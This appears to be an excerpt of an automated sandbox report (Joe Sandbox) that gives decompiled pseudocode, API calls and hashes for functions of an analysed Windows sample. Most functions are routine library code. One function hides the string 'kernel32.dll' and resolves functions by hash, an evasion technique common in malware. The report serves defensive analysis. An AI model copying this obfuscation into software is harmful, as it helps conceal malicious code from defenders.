                  • Opcode ID: 473b58f7a167e2a1e580efbb33301050c8c34e0b7915a5bdb1048dcc05cabd4f
                  • Instruction ID: 0dde8711315342f266c983668e91e282caa45335e5f9c97fc50be413763f188e
                  • Opcode Fuzzy Hash: 473b58f7a167e2a1e580efbb33301050c8c34e0b7915a5bdb1048dcc05cabd4f
                  • Instruction Fuzzy Hash: 0BE1E071A14746CFDB24CF69C884B2AB3E0FF84308F18462DE8959B241E774EC65CB91
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0041CB71, Relevance: 4.6, APIs: 3, Instructions: 70registryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 443 41cb71-41cba1 444 41cba7 443->444 445 41cc2f-41cc35 443->445 446 41cba8-41cbbe RegOpenKeyExW 444->446 447 41cbc0-41cbc3 446->447 448 41cc23-41cc28 446->448 449 41cc11-41cc15 447->449 448->446 450 41cc2e 448->450 451 41cbc5-41cbde RegQueryValueExW 449->451 452 41cc17-41cc20 RegCloseKey 449->452 450->445 453 41cc01-41cc0e 451->453 454 41cbe0-41cbe4 451->454 452->448 453->449 454->453 455 41cbe6-41cbef 454->455 456 41cbf1-41cbf7 455->456 457 41cbf9-41cbfb 455->457 456->453 457->453
                  C-Code - Quality: 100%
                  			E0041CB71(intOrPtr __ecx) {
				void* _v8;
				char _v12;
				int _v16;
				intOrPtr _v20;
				int _v24;
				long _t29;
				short* _t30;
				long _t31;
				intOrPtr _t32;
				short** _t34;
				signed int _t39;
				short** _t43;
				short* _t45;

				 *((intOrPtr*)(__ecx + 0xa0)) = 0;
				_v20 = __ecx;
				_v8 = 0;
				_v12 = 0;
				_v24 = 4;
				_v16 = 0;
				_t34 = 0x44bf98;
				_t45 =  *0x44bf98; // 0x43fec0
				if(_t45 == 0) {
					L14:
					return 1;
				}
				do {
					_t29 = RegOpenKeyExW(0x80000001,  *_t34, 0, 1,  &_v8); // executed
					if(_t29 != 0) {
						goto L12;
					}
					_t8 =  &(_t34[1]); // 0x44bfb8
					_t43 =  *_t8;
					while(1) {
						_t30 =  *_t43;
						if(_t30 == 0) {
							break;
						}
						_t31 = RegQueryValueExW(_v8, _t30, 0,  &_v16,  &_v12,  &_v24); // executed
						if(_t31 == 0 && _v16 == 4) {
							_t14 =  &(_t43[1]); // 0x1
							_t39 =  *_t14;
							_t32 = _v20;
							if(_v12 == 0) {
								 *(_t32 + 0xa0) =  *(_t32 + 0xa0) &  !_t39;
							} else {
								 *(_t32 + 0xa0) =  *(_t32 + 0xa0) | _t39;
							}
						}
						_v12 = 0;
						_v24 = 4;
						_v16 = 0;
						_t43 =  &(_t43[2]);
					}
					RegCloseKey(_v8); // executed
					_v8 = 0;
					L12:
					_t34 =  &(_t34[2]);
				} while ( *_t34 != 0);
				goto L14;
			}
















                  0x0041cb7d
                  0x0041cb83
                  0x0041cb86
                  0x0041cb89
                  0x0041cb8c
                  0x0041cb93
                  0x0041cb96
                  0x0041cb9b
                  0x0041cba1
                  0x0041cc2f
                  0x0041cc35
                  0x0041cc35
                  0x0041cba8
                  0x0041cbb6
                  0x0041cbbe
                  0x00000000
                  0x00000000
                  0x0041cbc0
                  0x0041cbc0
                  0x0041cc11
                  0x0041cc11
                  0x0041cc15
                  0x00000000
                  0x00000000
                  0x0041cbd6
                  0x0041cbde
                  0x0041cbe6
                  0x0041cbe6
                  0x0041cbe9
                  0x0041cbef
                  0x0041cbfb
                  0x0041cbf1
                  0x0041cbf1
                  0x0041cbf1
                  0x0041cbef
                  0x0041cc01
                  0x0041cc04
                  0x0041cc0b
                  0x0041cc0e
                  0x0041cc0e
                  0x0041cc1a
                  0x0041cc20
                  0x0041cc23
                  0x0041cc23
                  0x0041cc26
                  0x00000000

                  APIs
                  • RegOpenKeyExW.KERNEL32(80000001,0044BF98,00000000,00000001,?), ref: 0041CBB6
                  • RegQueryValueExW.KERNEL32(?,00000000,00000000,?,?,00000004), ref: 0041CBD6
                  • RegCloseKey.KERNEL32(?), ref: 0041CC1A
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: CloseOpenQueryValue
                  • String ID:
                  • API String ID: 3677997916-0
                  • Opcode ID: ea1195480fbbba6a98d9fb3fc3fe2dfb0237ba004e16e61be3966de3c6b5591e
                  • Instruction ID: d1cec9739bcbb39b65f8e54a44abfe215be5fa0c3725cffd160cc01e19d1f31b
                  • Opcode Fuzzy Hash: ea1195480fbbba6a98d9fb3fc3fe2dfb0237ba004e16e61be3966de3c6b5591e
                  • Instruction Fuzzy Hash: D0211871D40208EFDB15CF85DC85AEEFBB8EF94304F2040AAE45AA6250E3759E84DF55
                  Uniqueness

                  Uniqueness Score: 0.04%

                  Function 004290E0, Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 458 4290e0-4290ef call 4313d0 call 42c093 462 4290f4-429103 458->462 463 429105-429109 462->463 464 42910a-429110 462->464
                  C-Code - Quality: 100%
                  			E004290E0() {
				intOrPtr _t2;
				void* _t4;
				signed int* _t5;

				_t5 = E004313D0(0x20, 4);
				_t2 = E0042C093(_t5); // executed
				 *0x451a48 = _t2;
				 *0x451a44 = _t2;
				if(_t5 != 0) {
					 *_t5 =  *_t5 & 0x00000000;
					return 0;
				} else {
					_t4 = 0x18;
					return _t4;
				}
			}






                  0x004290ec
                  0x004290ef
                  0x004290f7
                  0x004290fc
                  0x00429103
                  0x0042910a
                  0x00429110
                  0x00429105
                  0x00429107
                  0x00429109
                  0x00429109

                  APIs
                  • __calloc_crt.LIBCMT ref: 004290E7
                    • Part of subcall function 004313D0: __calloc_impl.LIBCMT ref: 004313E1
                    • Part of subcall function 004313D0: Sleep.KERNEL32(00000000), ref: 004313F8
                  • __encode_pointer.LIBCMT ref: 004290EF
                    • Part of subcall function 0042C093: TlsGetValue.KERNEL32(00000000,?,0042C10C,00000000,00432532,0044FD18,00000000,00000314,?,0042B89E,0044FD18,Microsoft Visual C++ Runtime Library,00012010), ref: 0042C0A5
                    • Part of subcall function 0042C093: TlsGetValue.KERNEL32(00000003,?,0042C10C,00000000,00432532,0044FD18,00000000,00000314,?,0042B89E,0044FD18,Microsoft Visual C++ Runtime Library,00012010), ref: 0042C0BC
                    • Part of subcall function 0042C093: RtlEncodePointer.NTDLL(00000000,?,0042C10C,00000000,00432532,0044FD18,00000000,00000314,?,0042B89E,0044FD18,Microsoft Visual C++ Runtime Library,00012010), ref: 0042C0FA
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Value$EncodePointerSleep__calloc_crt__calloc_impl__encode_pointer
                  • String ID:
                  • API String ID: 2812158048-0
                  • Opcode ID: 099ba0099273266afa93c9c998775dbba264b75b7e720abb2867d1201169871e
                  • Instruction ID: eddcd4aae5d6fe95ac814a4f59b5bec93168f2b88cf43eeb86a56ee575f9c656
                  • Opcode Fuzzy Hash: 099ba0099273266afa93c9c998775dbba264b75b7e720abb2867d1201169871e
                  • Instruction Fuzzy Hash: 1AD05B72E457315AF37157767C067D626809750B71F110037F904DA5D1F9B48C4147CC
                  Uniqueness

                  Uniqueness Score: 0.08%

                  Function 0041DC8F, Relevance: 3.0, APIs: 2, Instructions: 15threadCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 465 41dc8f-41dc98 call 42083d 468 41dc9a-41dcbb call 420285 GetCurrentThreadId SetWindowsHookExW 465->468 469 41dcbc 465->469 468->469
                  C-Code - Quality: 86%
                  			E0041DC8F(void* __esi, void* __eflags) {
				void* _t3;
				void* _t4;
				struct HHOOK__* _t6;
				void* _t7;
				void* _t8;

				_t3 = E0042083D(_t7, _t8, __esi, __eflags);
				_t13 =  *((char*)(_t3 + 0x14));
				if( *((char*)(_t3 + 0x14)) == 0) {
					_push(__esi);
					_t4 = E00420285(_t7, _t8, __esi, _t13);
					_t6 = SetWindowsHookExW(0xffffffff, E0041DAF7, 0, GetCurrentThreadId()); // executed
					 *(_t4 + 0x2c) = _t6;
					return _t6;
				}
				return _t3;
			}








                  0x0041dc8f
                  0x0041dc94
                  0x0041dc98
                  0x0041dc9a
                  0x0041dc9b
                  0x0041dcb2
                  0x0041dcb8
                  0x00000000
                  0x0041dcbb
                  0x0041dcbc

                  APIs
                  • GetCurrentThreadId.KERNEL32(?,00427842), ref: 0041DCA2
                  • SetWindowsHookExW.USER32(000000FF,Function_0001DAF7,00000000,00000000), ref: 0041DCB2
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: CurrentHookThreadWindows
                  • String ID:
                  • API String ID: 1904029216-0
                  • Opcode ID: a62b3ebce883956cea7f2d3f5852568ac672d1e22f3a5a8ce26a305ec22f6b76
                  • Instruction ID: 14a41e18f83d61efec058bc26898e78cc3e21de305476270d92e2adef75165a7
                  • Opcode Fuzzy Hash: a62b3ebce883956cea7f2d3f5852568ac672d1e22f3a5a8ce26a305ec22f6b76
                  • Instruction Fuzzy Hash: 44D0A7719482206EDB20BB707D0DB5B3E949F01320F14129BF490911D2DA7888818BAE
                  Uniqueness

                  Uniqueness Score: 0.14%

                  Function 004206BD, Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 482 4206bd-420724 call 42925e call 404820 call 405860 488 420729-42077d call 40b71f call 41efd6 482->488 494 420786 488->494 495 42077f-420784 call 4203af 488->495 497 420788-4207a2 call 41efd6 494->497 495->497 501 4207a4-4207a9 call 4205f3 497->501 502 4207ab 497->502 504 4207ad-4207c8 call 41efd6 501->504 502->504 508 4207d1 504->508 509 4207ca-4207cf call 420676 504->509 511 4207d3-4207f5 call 429303 508->511 509->511
                  C-Code - Quality: 93%
                  			E004206BD(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t49;
				intOrPtr _t51;
				intOrPtr _t53;
				intOrPtr _t63;
				intOrPtr _t65;
				intOrPtr _t67;
				intOrPtr _t72;
				void* _t73;
				intOrPtr* _t74;
				void* _t75;

				_t75 = __eflags;
				_push(0xc);
				E0042925E(E0043952E, __ebx, __edi, __esi);
				_t72 = __ecx;
				 *((intOrPtr*)(_t73 - 0x14)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x440738;
				 *((intOrPtr*)(__ecx + 0x1c)) = 0;
				 *((intOrPtr*)(__ecx + 0x20)) = 0;
				_t57 = __ecx + 0x34;
				 *((intOrPtr*)(__ecx + 0x24)) = 0;
				 *((intOrPtr*)(__ecx + 0x28)) = 0;
				E00404820(__ecx + 0x34);
				 *((intOrPtr*)(_t72 + 0x40)) = 0;
				 *((intOrPtr*)(_t72 + 0x44)) = 0;
				 *(_t72 + 0x50) =  *(_t72 + 0x50) | 0xffffffff;
				 *((intOrPtr*)(_t73 - 4)) = 0;
				 *((intOrPtr*)(_t72 + 0x54)) = 0;
				 *((intOrPtr*)(_t72 + 0x68)) = 0;
				 *((intOrPtr*)(_t72 + 0x6c)) = 0;
				 *((intOrPtr*)(_t72 + 0x28)) = 0x20;
				 *((intOrPtr*)(_t72 + 0x20)) = 0x14;
				 *((intOrPtr*)(_t72 + 0x18)) = 0;
				 *((char*)(_t72 + 0x14)) =  *((intOrPtr*)(_t73 + 8));
				 *((char*)(_t73 - 4)) = 2;
				E00405860(_t57, _t75, 0x1000); // executed
				 *((intOrPtr*)(_t73 - 4)) = 1;
				 *((intOrPtr*)(_t72 + 0x30)) = 1;
				 *((intOrPtr*)(_t72 + 0x44)) = 0x18;
				 *((intOrPtr*)(_t72 + 0x78)) = E0040B71F(_t75, 0xc);
				 *_t74 = 0x188;
				_t63 = E0041EFD6();
				 *((intOrPtr*)(_t73 + 8)) = _t63;
				 *((char*)(_t73 - 4)) = 4;
				_t76 = _t63;
				if(_t63 == 0) {
					_t49 = 0;
					__eflags = 0;
				} else {
					_t49 = E004203AF(1, _t63, 0, _t72, _t76);
				}
				 *((char*)(_t73 - 4)) = 1;
				 *((intOrPtr*)( *((intOrPtr*)(_t72 + 0x78)))) = _t49;
				_t65 = E0041EFD6(0x64);
				 *((intOrPtr*)(_t73 + 8)) = _t65;
				 *((char*)(_t73 - 4)) = 5;
				_t77 = _t65;
				if(_t65 == 0) {
					_t51 = 0;
					__eflags = 0;
				} else {
					_t51 = E004205F3(1, _t65, 0, _t72, _t77);
				}
				 *((char*)(_t73 - 4)) = 1;
				 *((intOrPtr*)( *((intOrPtr*)(_t72 + 0x78)) + 4)) = _t51;
				_t67 = E0041EFD6(0x14);
				 *((intOrPtr*)(_t73 + 8)) = _t67;
				 *((char*)(_t73 - 4)) = 6;
				_t78 = _t67;
				if(_t67 == 0) {
					_t53 = 0;
					__eflags = 0;
				} else {
					_t53 = E00420676(1, _t67, 0, _t72, _t78);
				}
				 *((intOrPtr*)( *((intOrPtr*)(_t72 + 0x78)) + 8)) = _t53;
				 *((intOrPtr*)(_t72 + 0x7c)) = 1;
				 *((intOrPtr*)(_t72 + 0x80)) = 0;
				 *((intOrPtr*)(_t72 + 0x84)) = 0;
				 *((intOrPtr*)(_t72 + 0x88)) = 0;
				return E00429303(_t72);
			}













                  0x004206bd
                  0x004206bd
                  0x004206c4
                  0x004206c9
                  0x004206cb
                  0x004206ce
                  0x004206d6
                  0x004206d9
                  0x004206dc
                  0x004206e1
                  0x004206e4
                  0x004206e7
                  0x004206ec
                  0x004206ef
                  0x004206f2
                  0x004206f6
                  0x004206f9
                  0x004206fc
                  0x004206ff
                  0x0042070c
                  0x00420713
                  0x0042071a
                  0x0042071d
                  0x00420720
                  0x00420724
                  0x0042072c
                  0x00420754
                  0x00420757
                  0x00420763
                  0x00420766
                  0x00420772
                  0x00420774
                  0x00420777
                  0x0042077b
                  0x0042077d
                  0x00420786
                  0x00420786
                  0x0042077f
                  0x0042077f
                  0x0042077f
                  0x0042078d
                  0x00420790
                  0x00420797
                  0x00420799
                  0x0042079c
                  0x004207a0
                  0x004207a2
                  0x004207ab
                  0x004207ab
                  0x004207a4
                  0x004207a4
                  0x004207a4
                  0x004207b2
                  0x004207b5
                  0x004207bd
                  0x004207bf
                  0x004207c2
                  0x004207c6
                  0x004207c8
                  0x004207d1
                  0x004207d1
                  0x004207ca
                  0x004207ca
                  0x004207ca
                  0x004207d6
                  0x004207d9
                  0x004207dc
                  0x004207e2
                  0x004207e8
                  0x004207f5

                  APIs
                  • __EH_prolog3_catch.LIBCMT ref: 004206C4
                    • Part of subcall function 0040B71F: _malloc.LIBCMT ref: 0040B73D
                    • Part of subcall function 0041EFD6: LocalAlloc.KERNEL32(00000040,?,?,0041F3D2,00000010,?,?,00000000,?,00000004,0042084C,0040C879,0041196D,?,0040CD7B), ref: 0041EFE0
                    • Part of subcall function 004203AF: __EH_prolog3.LIBCMT ref: 004203B6
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: AllocH_prolog3H_prolog3_catchLocal_malloc
                  • String ID:
                  • API String ID: 1104862767-0
                  • Opcode ID: 34b7269766e8a1f28077c4d949f28dc42f9bfe4fd9dd59ba79e1cea181368471
                  • Instruction ID: a4cb265193a99c2c269700e51152e056293c3cbff11ec4de8c9d78e362c4d40f
                  • Opcode Fuzzy Hash: 34b7269766e8a1f28077c4d949f28dc42f9bfe4fd9dd59ba79e1cea181368471
                  • Instruction Fuzzy Hash: F2318EB0A01B40DFD760DF6A814025AFFE0BF98304F60891FD59A87792C7B9A544CB59
                  Uniqueness

                  Uniqueness Score: 0.04%

                  Function 004080A0, Relevance: 1.6, APIs: 1, Instructions: 70libraryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 82%
                  			E004080A0(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, void* __eflags, WCHAR* _a4, intOrPtr _a8) {
				void* _v8;
				void* _v12;
				signed int _v16;
				short _v20;
				short _v22;
				short _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				short _v38;
				short _v40;
				short _v42;
				char _v44;
				void* _v48;
				signed int _t29;
				struct HINSTANCE__* _t41;
				signed int _t61;

				_t67 = __eflags;
				_t29 =  *0x44c364; // 0xa6e2bca1
				_v16 = _t29 ^ _t61;
				_v8 = 0;
				_v48 = 0;
				_v12 = 0;
				_v44 = 0x6b;
				_v42 = 0x65;
				_v40 = 0x72;
				_v38 = 0x6e;
				_v36 = 0x65;
				_v34 = 0x6c;
				_v32 = 0x33;
				_v30 = 0x32;
				_v28 = 0x2e;
				_v26 = 0x64;
				_v24 = 0x6c;
				_v22 = 0x6c;
				_v20 = 0;
				_v48 = E00407FF0(E00407F90( &_v44, __eflags,  &_v44), 0x6fc49b7c);
				_v12 = E00407FF0(E00407F90( &_v44, _t67,  &_v44), 0xc97c1fff);
				_t41 = LoadLibraryExW(_a4, 0, 0);
				_v8 = _v12(_a8);
				return E00427DFF(_v8, __ebx, _v16 ^ _t61,  &_v44, __edi, __esi, _t41);
			}























                  0x004080a0
                  0x004080a6
                  0x004080ad
                  0x004080b0
                  0x004080b7
                  0x004080be
                  0x004080ca
                  0x004080d3
                  0x004080dc
                  0x004080e5
                  0x004080ee
                  0x004080f7
                  0x00408100
                  0x00408109
                  0x00408112
                  0x0040811b
                  0x00408124
                  0x0040812d
                  0x00408133
                  0x00408151
                  0x0040816e
                  0x0040817d
                  0x00408184
                  0x00408197

                  APIs
                  • LoadLibraryExW.KERNELBASE(00000000,00000000,00000000,?), ref: 0040817D
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: LibraryLoad
                  • String ID:
                  • API String ID: 1029625771-0
                  • Opcode ID: ef4e3f2ff3eb2b8509d181c276cc1ebd58e7fca335161a0d1f82af9ea71a60a1
                  • Instruction ID: ae54b4be265e21ae134f77016d1930a8b1da2d415affaa5bcbc638975f7b00a6
                  • Opcode Fuzzy Hash: ef4e3f2ff3eb2b8509d181c276cc1ebd58e7fca335161a0d1f82af9ea71a60a1
                  • Instruction Fuzzy Hash: 6E213E64E142089BEB00DFF4D8417EEB775EF18304F00906DE509FB391EA7A9A1487AA
                  Uniqueness

                  Uniqueness Score: 0.06%

                  Function 00406010, Relevance: 1.6, APIs: 1, Instructions: 65COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 86%
                  			E00406010(intOrPtr __ecx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				intOrPtr _t40;
				void* _t44;

				_v24 = __ecx;
				_v20 = E00405840(_v24);
				_v12 =  *((intOrPtr*)(_v20 + 4));
				_v28 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_v20)) + 0x10))))();
				_t40 =  *((intOrPtr*)( *((intOrPtr*)( *_v28))))(_a4, 2); // executed
				_v16 = _t40;
				if(_v16 == 0) {
					E00406000();
				}
				if(_v12 >= _a4) {
					_v32 = _a4;
				} else {
					_v32 = _v12;
				}
				_v8 = _v32 + 1;
				_t44 = E00405DA0(_v20);
				E00405FA0(E00405DA0(_v16), _v8, _t44, _v8);
				 *((intOrPtr*)(_v16 + 4)) = _v12;
				E004055F0(_v20);
				return E00405D80(_v24, _v16);
			}












                  0x00406016
                  0x00406021
                  0x0040602a
                  0x0040603e
                  0x00406051
                  0x00406053
                  0x0040605a
                  0x0040605c
                  0x0040605c
                  0x00406067
                  0x00406074
                  0x00406069
                  0x0040606c
                  0x0040606c
                  0x0040607d
                  0x00406087
                  0x0040609a
                  0x004060a8
                  0x004060ae
                  0x004060c2

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: _wmemcpy_s
                  • String ID:
                  • API String ID: 67063488-0
                  • Opcode ID: 83d999910e17adc4ce2e608899040abd549941d644afee2c92b128ca02c69bf7
                  • Instruction ID: 89085cfe1f794eabe7504a54d64f3ab6e25fff30613185d8de56a4d33b2279b5
                  • Opcode Fuzzy Hash: 83d999910e17adc4ce2e608899040abd549941d644afee2c92b128ca02c69bf7
                  • Instruction Fuzzy Hash: 932196B4E005099FCB04EF99C8959AFB7B5FF88304F5081AAE915A7391DA34AE41CF94
                  Uniqueness

                  Uniqueness Score: 0.50%

                  Function 0041F599, Relevance: 1.5, APIs: 1, Instructions: 43COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 96%
                  			E0041F599(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				long* _t24;
				intOrPtr _t25;
				intOrPtr* _t30;
				void* _t31;

				_t23 = __ecx;
				_t22 = __ebx;
				_push(4);
				E0042922B(E00439404, __ebx, __edi, __esi);
				_t30 = __ecx;
				if((0 |  *((intOrPtr*)(_t31 + 8)) != 0x00000000) == 0) {
					L1:
					E00413DD0(_t23);
				}
				if( *_t30 == 0) {
					_t23 =  *0x44f9b8; // 0x44f9bc
					if(_t23 != 0) {
						L5:
						_t19 = E0041F197(_t23); // executed
						 *_t30 = _t19;
						if(_t19 == 0) {
							goto L1;
						}
					} else {
						 *((intOrPtr*)(_t31 - 0x10)) = 0x44f9bc;
						 *(_t31 - 4) =  *(_t31 - 4) & 0x00000000;
						_t21 = E0041F2AF(0x44f9bc);
						 *(_t31 - 4) =  *(_t31 - 4) | 0xffffffff;
						_t23 = _t21;
						 *0x44f9b8 = _t21;
						if(_t21 == 0) {
							goto L1;
						} else {
							goto L5;
						}
					}
				}
				_t24 =  *0x44f9b8; // 0x44f9bc
				_t28 = E0041F009(_t24,  *_t30);
				_t39 = _t28;
				if(_t28 == 0) {
					_t17 =  *((intOrPtr*)(_t31 + 8))();
					_t25 =  *0x44f9b8; // 0x44f9bc
					_t28 = _t17;
					E0041F356(_t22, _t25, _t17, _t30, _t39,  *_t30, _t17);
				}
				return E00429303(_t28);
			}










                  0x0041f599
                  0x0041f599
                  0x0041f599
                  0x0041f5a0
                  0x0041f5a5
                  0x0041f5b1
                  0x0041f5b3
                  0x0041f5b3
                  0x0041f5b3
                  0x0041f5bb
                  0x0041f5bd
                  0x0041f5c5
                  0x0041f5e8
                  0x0041f5e8
                  0x0041f5ed
                  0x0041f5f1
                  0x00000000
                  0x00000000
                  0x0041f5c7
                  0x0041f5cc
                  0x0041f5cf
                  0x0041f5d3
                  0x0041f5d8
                  0x0041f5dc
                  0x0041f5de
                  0x0041f5e6
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0041f5e6
                  0x0041f5c5
                  0x0041f5f5
                  0x0041f600
                  0x0041f602
                  0x0041f604
                  0x0041f606
                  0x0041f609
                  0x0041f60f
                  0x0041f614
                  0x0041f614
                  0x0041f620

                  APIs
                  • __EH_prolog3.LIBCMT ref: 0041F5A0
                    • Part of subcall function 00413DD0: __CxxThrowException@8.LIBCMT ref: 00413DE6
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Exception@8H_prolog3Throw
                  • String ID:
                  • API String ID: 3670251406-0
                  • Opcode ID: 3ac3d268d6aaef077082b25c9ea7ce6d9e6f69832c921aa6c43d64ce0de0c15e
                  • Instruction ID: 1f935acb8d0608f5d112bb32aab73b50fff3c02da3f5b22281a840c8b569f305
                  • Opcode Fuzzy Hash: 3ac3d268d6aaef077082b25c9ea7ce6d9e6f69832c921aa6c43d64ce0de0c15e
                  • Instruction Fuzzy Hash: 0A017175610202EBDB14AF75E8017AA76A2BB95359F14443EE85187392EF38CD8BC71C
                  Uniqueness

                  Uniqueness Score: 0.01%

                  Function 00521900, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                  Download Yara Rule
                  APIs
                  • ExitProcess.KERNELBASE(00000000), ref: 0052196E
                  Memory Dump Source
                  • Source File: 00000004.00000002.297282519.00521000.00000020.00000001.sdmp, Offset: 00521000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_521000_982.jbxd
                  Similarity
                  • API ID: ExitProcess
                  • String ID:
                  • API String ID: 621844428-0
                  • Opcode ID: c91d6f3eafcad21bdfdb2da13fbaa76f58c5e28d6601133ce88788043121f449
                  • Instruction ID: b3d5d56a2863a6fa03aa470d6f304b2900ecc9b30246237bdce5614da3aca580
                  • Opcode Fuzzy Hash: c91d6f3eafcad21bdfdb2da13fbaa76f58c5e28d6601133ce88788043121f449
                  • Instruction Fuzzy Hash: A1F0C231D001199BEB10EFB4D805BDFFBB9FF45310F40809AAA0867281FA311A0ACBE5
                  Uniqueness

                  Uniqueness Score: 0.01%

                  Function 004153F5, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E004153F5(intOrPtr __ecx, intOrPtr _a4, signed int _a8) {
				void* __edi;
				intOrPtr* _t11;
				void* _t13;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t18;

				_t18 = _a4;
				_t17 = __ecx;
				if(_t18 >= 0) {
					_t11 = E004282CD(_t13, _t16, __ecx, (_t18 + 1) * _a8 + 0x10); // executed
					if(_t11 == 0) {
						goto L1;
					}
					 *(_t11 + 4) =  *(_t11 + 4) & 0x00000000;
					 *_t11 = _t17;
					 *((intOrPtr*)(_t11 + 0xc)) = 1;
					 *((intOrPtr*)(_t11 + 8)) = _t18;
					return _t11;
				}
				L1:
				return 0;
			}









                  0x004153fb
                  0x004153ff
                  0x00415403
                  0x00415414
                  0x0041541c
                  0x00000000
                  0x00000000
                  0x0041541e
                  0x00415422
                  0x00415424
                  0x0041542b
                  0x00000000
                  0x0041542b
                  0x00415405
                  0x00000000

